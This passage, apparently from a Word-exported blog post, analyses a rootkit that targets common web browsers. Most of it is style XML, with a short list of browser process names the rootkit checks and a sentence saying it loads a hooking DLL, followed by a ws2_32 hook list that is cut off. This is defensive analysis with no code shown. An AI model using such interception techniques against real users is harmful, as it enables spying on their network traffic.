UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></div>
<ul type="disc">
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">iexplore.exe </span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">firefox.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">chrome.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">safari.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">opera.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">maxthon.exe</span></li>
</ul>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
said process names are names of common internet browsers used by many computer
users. Once all the conditions are verified, the rootkit will load a special
DLL in memory which installs additional hooks and is the one responsible for intercepting messages. </span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
</div>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br />
Hooks the following ws2_32 functions <br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
